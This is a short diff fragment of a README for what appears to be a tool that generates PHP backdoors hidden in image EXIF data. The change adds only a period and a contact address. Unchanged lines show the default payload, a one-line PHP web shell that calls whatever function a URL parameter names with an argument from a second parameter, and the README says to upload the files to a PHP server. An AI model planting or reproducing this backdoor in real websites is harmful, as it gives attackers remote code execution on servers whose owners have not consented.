CCSIR/PHP-EXIF-Backdoors-generator-using-custom-shellcode/README.md

 * Default: !empty(\$1=@\$_GET[1]) && \$1(\$_GET[2]);

 ##Help
   - No need.
-Just download these files and upload in an environment that supports PHP
+Just download these files and upload in an environment that supports PHP.
+You can send any feedback or questions to contact [at] ccsir [dot] org

 ##License